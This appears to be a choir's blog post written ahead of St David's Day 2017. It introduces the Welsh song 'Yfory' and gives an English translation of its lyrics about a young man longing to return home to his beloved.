As we approach St David’s Day 2017, here is an insight into one of the songs the choir will perform at their celebration concert.

St David's Day

The translation of “Yfory” from Welsh into English is “Tomorrow”. The music is written by Robat Arwyn, arranged by Eric Jones, and lyrics by Geriant Eckley. I believe the words describe a young man’s thoughts about his loved one, as he completes his work day. He looks forward to being in the arms of his beloved once again, for tomorrow his yearning will be satisfied when he’ll  journey home to be reunited. Our distinqished accompanist Michael  Jones has given a poetic deft to my attempted translation, whilst the lyrics give a rhythmical lift to the young man’s longing for tomorrow…

The day’s work has ended,

Everyone have said their goodbyes,

I’ll hang around for a while

Killing time for a moment longer

But tomorrow the sun will shine again,

And in the light of day I’ll travel

Home to the smile of my beloved

The light of my love on my way

Only a night, only a night

Tomorrow I will be back,

Back in your company, back in your arms

Tomorrow I will return

I put my head on the pillow

And think about you

I feel your presence with me

You are the magic of my night

Tonight I’ll think about you

From my bed in this faraway place

But tomorrow I’ll be back in your company

Set free from this prison cell

Only a night, only a night

Tomorrow I will be back,

Back in your company, back in your arms

Tomorrow I will return
